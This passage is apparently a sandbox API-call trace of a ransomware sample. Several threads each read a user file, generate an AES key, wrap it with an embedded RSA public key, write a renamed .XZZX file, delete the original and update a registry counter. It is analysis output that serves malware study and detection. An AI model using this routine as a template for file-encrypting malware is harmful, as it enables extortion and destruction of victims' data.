phkResult=0x471dfe8 | out: phkResult=0x471dfe8*=0x8fc) returned 0x0 [0145.770] RegSetValueExW (in: hKey=0x8fc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x471dfec*=0xd7, cbData=0x4 | out: lpData=0x471dfec*=0xd7) returned 0x0 [0145.770] RegCloseKey (hKey=0x8fc) returned 0x0 [0145.770] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.770] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.771] CloseHandle (hObject=0x8e4) returned 1 [0145.776] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0145.777] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0145.777] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg")) returned 1 [0145.780] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg")) returned 0 Thread: id = 521 os_tid = 0xb84 [0145.645] lstrcpyA (in: lpString1=0x49dfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.645] lstrcpyW (in: lpString1=0x49df460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0145.645] lstrcpyW (in: lpString1=0x49de860, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\" [0145.645] SetErrorMode (uMode=0x1) returned 0x1 [0145.645] lstrcpyW (in: lpString1=0x49df860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0145.646] CoCreateGuid (in: pguid=0x49de440 | out: pguid=0x49de440*(Data1=0xe23edaf1, Data2=0x6689, Data3=0x4c64, Data4=([0]=0xb6, [1]=0xa9, [2]=0x23, [3]=0x16, [4]=0x4e, [5]=0xe, [6]=0x8f, [7]=0xbb))) returned 0x0 [0145.646] wsprintfW (in: param_1=0x49dec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0145.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x49dfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0145.646] wsprintfW (in: param_1=0x49de450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\1EDF30F91E98B984E23EDAF123369DCC.XZZX") returned 69 [0145.646] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0145.646] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini", dwFileAttributes=0x20) returned 1 [0145.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e8 [0145.716] ReadFile (in: hFile=0x8e8, lpBuffer=0x3ca3d30, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x49de418, lpOverlapped=0x0 | out: lpBuffer=0x3ca3d30*, lpNumberOfBytesRead=0x49de418*=0x50, lpOverlapped=0x0) returned 1 [0145.716] CloseHandle (hObject=0x8e8) returned 1 [0145.716] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0145.718] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4110000 [0145.718] SetErrorMode (uMode=0x1) returned 0x1 [0145.718] lstrcpyW (in: lpString1=0x49de358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0145.718] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437a470) returned 1 [0145.721] CryptGenKey (in: hProv=0x437a470, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11e58) returned 1 [0146.250] CryptExportKey (in: hKey=0x3d11e58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x49de41c | out: pbData=0x0*, pdwDataLen=0x49de41c*=0x94) returned 1 [0146.250] CryptExportKey (in: hKey=0x3d11e58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4110000, pdwDataLen=0x49de41c | out: pbData=0x4110000*, pdwDataLen=0x49de41c*=0x94) returned 1 [0146.250] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.251] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0146.251] CryptDestroyKey (hKey=0x3d11e58) returned 1 [0146.251] CryptReleaseContext (hProv=0x437a7a0, dwFlags=0x0) returned 0 [0146.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\1EDF30F91E98B984E23EDAF123369DCC.XZZX" (normalized: "c:\\users\\public\\recorded tv\\1edf30f91e98b984e23edaf123369dcc.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x914 [0146.355] WriteFile (in: hFile=0x914, lpBuffer=0x3ca3d30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x49de438, lpOverlapped=0x0 | out: lpBuffer=0x3ca3d30*, lpNumberOfBytesWritten=0x49de438*=0x50, lpOverlapped=0x0) returned 1 [0146.356] SetFilePointer (in: hFile=0x914, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0146.356] WriteFile (in: hFile=0x914, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49de438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49de438*=0x5, lpOverlapped=0x0) returned 1 [0146.356] SetFilePointer (in: hFile=0x914, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x55 [0146.356] WriteFile (in: hFile=0x914, lpBuffer=0x49df860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x49de438, lpOverlapped=0x0 | out: lpBuffer=0x49df860*, lpNumberOfBytesWritten=0x49de438*=0x16, lpOverlapped=0x0) returned 1 [0146.356] SetFilePointer (in: hFile=0x914, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b [0146.356] WriteFile (in: hFile=0x914, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49de438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49de438*=0x5, lpOverlapped=0x0) returned 1 [0146.356] SetFilePointer (in: hFile=0x914, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x70 [0146.356] SetErrorMode (uMode=0x1) returned 0x1 [0146.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0146.356] OutputDebugStringW (lpOutputString="end") [0146.357] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ\x9d\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x49ddbf4, pcbBinary=0x49dd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x49ddbf4, pcbBinary=0x49dd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0146.357] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x49ddbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x49dd3dc, pcbStructInfo=0x49dd3d8 | out: pvStructInfo=0x49dd3dc, pcbStructInfo=0x49dd3d8) returned 1 [0146.357] CryptAcquireContextW (in: phProv=0x49dd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x49dd3e4*=0x437a828) returned 1 [0146.357] CryptImportPublicKeyInfo (in: hCryptProv=0x437a828, dwCertEncodingType=0x1, pInfo=0x3cf3250*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf3280*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf3288*, PublicKey.cUnusedBits=0x0), phKey=0x49dd3ec | out: phKey=0x49dd3ec*=0x3d11e58) returned 1 [0146.357] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.358] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0146.358] CryptEncrypt (in: hKey=0x3d11e58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x49dd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x49dd3f0*=0x80) returned 1 [0146.358] CryptEncrypt (in: hKey=0x3d11e58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437a8b0*, pdwDataLen=0x49dd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x437a8b0*, pdwDataLen=0x49dd3e8*=0x80) returned 1 [0146.358] WriteFile (in: hFile=0x914, lpBuffer=0x437a8b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x49de438, lpOverlapped=0x0 | out: lpBuffer=0x437a8b0*, lpNumberOfBytesWritten=0x49de438*=0x80, lpOverlapped=0x0) returned 1 [0146.358] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0146.358] WriteFile (in: hFile=0x914, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49de438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49de438*=0x5, lpOverlapped=0x0) returned 1 [0146.359] GetUserNameW (in: lpBuffer=0x49de1f8, pcbBuffer=0x49ddfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x49ddfe0) returned 1 [0146.359] wsprintfW (in: param_1=0x49ddff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0146.359] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x49ddfe4 | out: phkResult=0x49ddfe4*=0x918) returned 0x0 [0146.359] RegQueryValueExW (in: hKey=0x918, lpValueName="E1010314", lpReserved=0x0, lpType=0x49ddfd8, lpData=0x49ddfec, lpcbData=0x49ddfdc*=0x4 | out: lpType=0x49ddfd8*=0x4, lpData=0x49ddfec*=0xd7, lpcbData=0x49ddfdc*=0x4) returned 0x0 [0146.359] RegCloseKey (hKey=0x918) returned 0x0 [0146.359] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x49ddfe8 | out: phkResult=0x49ddfe8*=0x918) returned 0x0 [0146.359] RegSetValueExW (in: hKey=0x918, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x49ddfec*=0xd8, cbData=0x4 | out: lpData=0x49ddfec*=0xd8) returned 0x0 [0146.359] RegCloseKey (hKey=0x918) returned 0x0 [0146.359] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.360] VirtualFree (lpAddress=0x4110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.360] CloseHandle (hObject=0x914) returned 1 [0146.361] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0146.361] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0146.361] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini")) returned 1 [0146.362] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini")) returned 0 Thread: id = 522 os_tid = 0xb88 [0145.820] lstrcpyA (in: lpString1=0x433fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.820] lstrcpyW (in: lpString1=0x433f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0145.820] lstrcpyW (in: lpString1=0x433e860, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0145.820] SetErrorMode (uMode=0x1) returned 0x1 [0145.820] lstrcpyW (in: lpString1=0x433f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0145.820] CoCreateGuid (in: pguid=0x433e440 | out: pguid=0x433e440*(Data1=0x29376686, Data2=0x61c2, Data3=0x4b0a, Data4=([0]=0x90, [1]=0x9f, [2]=0x9f, [3]=0xcb, [4]=0xac, [5]=0xa, [6]=0x8e, [7]=0x9a))) returned 0x0 [0145.820] wsprintfW (in: param_1=0x433ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0145.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x433fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0145.820] wsprintfW (in: param_1=0x433e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\39D4778C1CA7A7942937668620DB8BDC.XZZX") returned 82 [0145.820] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0145.820] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", dwFileAttributes=0x20) returned 1 [0145.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c8 [0145.821] ReadFile (in: hFile=0x8c8, lpBuffer=0x3cc0ff0, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x433e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc0ff0*, lpNumberOfBytesRead=0x433e418*=0xab, lpOverlapped=0x0) returned 1 [0145.821] CloseHandle (hObject=0x8c8) returned 1 [0145.821] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0145.822] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0145.822] SetErrorMode (uMode=0x1) returned 0x1 [0145.823] lstrcpyW (in: lpString1=0x433e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0145.823] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437a718) returned 1 [0145.826] CryptGenKey (in: hProv=0x437a718, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4371ff8) returned 1 [0146.269] CryptExportKey (in: hKey=0x4371ff8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x433e41c | out: pbData=0x0*, pdwDataLen=0x433e41c*=0x94) returned 1 [0146.269] CryptExportKey (in: hKey=0x4371ff8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x433e41c | out: pbData=0x40a0000*, pdwDataLen=0x433e41c*=0x94) returned 1 [0146.269] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.269] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0146.269] CryptDestroyKey (hKey=0x4371ff8) returned 1 [0146.269] CryptReleaseContext (hProv=0x437a7a0, dwFlags=0x0) returned 0 [0146.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\39D4778C1CA7A7942937668620DB8BDC.XZZX" (normalized: "c:\\users\\public\\recorded tv\\sample media\\39d4778c1ca7a7942937668620db8bdc.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ec [0146.383] WriteFile (in: hFile=0x8ec, lpBuffer=0x3cc0ff0*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x433e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc0ff0*, lpNumberOfBytesWritten=0x433e438*=0xab, lpOverlapped=0x0) returned 1 [0146.384] SetFilePointer (in: hFile=0x8ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xab [0146.384] WriteFile (in: hFile=0x8ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x433e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x433e438*=0x5, lpOverlapped=0x0) returned 1 [0146.384] SetFilePointer (in: hFile=0x8ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb0 [0146.384] WriteFile (in: hFile=0x8ec, lpBuffer=0x433f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x433e438, lpOverlapped=0x0 | out: lpBuffer=0x433f860*, lpNumberOfBytesWritten=0x433e438*=0x16, lpOverlapped=0x0) returned 1 [0146.384] SetFilePointer (in: hFile=0x8ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc6 [0146.384] WriteFile (in: hFile=0x8ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x433e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x433e438*=0x5, lpOverlapped=0x0) returned 1 [0146.384] SetFilePointer (in: hFile=0x8ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcb [0146.384] SetErrorMode (uMode=0x1) returned 0x1 [0146.384] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0146.384] OutputDebugStringW (lpOutputString="end") [0146.384] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ3\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x433dbf4, pcbBinary=0x433d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x433dbf4, pcbBinary=0x433d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0146.384] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x433dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x433d3dc, pcbStructInfo=0x433d3d8 | out: pvStructInfo=0x433d3dc, pcbStructInfo=0x433d3d8) returned 1 [0146.385] CryptAcquireContextW (in: phProv=0x433d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x433d3e4*=0x437a938) returned 1 [0146.385] CryptImportPublicKeyInfo (in: hCryptProv=0x437a938, dwCertEncodingType=0x1, pInfo=0x3cf2f10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2f40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2f48*, PublicKey.cUnusedBits=0x0), phKey=0x433d3ec | out: phKey=0x433d3ec*=0x4372038) returned 1 [0146.385] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.386] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0146.386] CryptEncrypt (in: hKey=0x4372038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x433d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x433d3f0*=0x80) returned 1 [0146.386] CryptEncrypt (in: hKey=0x4372038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437a9c0*, pdwDataLen=0x433d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x437a9c0*, pdwDataLen=0x433d3e8*=0x80) returned 1 [0146.386] WriteFile (in: hFile=0x8ec, lpBuffer=0x437a9c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x433e438, lpOverlapped=0x0 | out: lpBuffer=0x437a9c0*, lpNumberOfBytesWritten=0x433e438*=0x80, lpOverlapped=0x0) returned 1 [0146.386] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0146.386] WriteFile (in: hFile=0x8ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x433e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x433e438*=0x5, lpOverlapped=0x0) returned 1 [0146.386] GetUserNameW (in: lpBuffer=0x433e1f8, pcbBuffer=0x433dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x433dfe0) returned 1 [0146.386] wsprintfW (in: param_1=0x433dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0146.386] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x433dfe4 | out: phkResult=0x433dfe4*=0x8f0) returned 0x0 [0146.386] RegQueryValueExW (in: hKey=0x8f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x433dfd8, lpData=0x433dfec, lpcbData=0x433dfdc*=0x4 | out: lpType=0x433dfd8*=0x4, lpData=0x433dfec*=0xd8, lpcbData=0x433dfdc*=0x4) returned 0x0 [0146.386] RegCloseKey (hKey=0x8f0) returned 0x0 [0146.386] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x433dfe8 | out: phkResult=0x433dfe8*=0x8f0) returned 0x0 [0146.386] RegSetValueExW (in: hKey=0x8f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x433dfec*=0xd9, cbData=0x4 | out: lpData=0x433dfec*=0xd9) returned 0x0 [0146.387] RegCloseKey (hKey=0x8f0) returned 0x0 [0146.387] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.387] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.387] CloseHandle (hObject=0x8ec) returned 1 [0146.388] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0146.388] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0146.388] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" 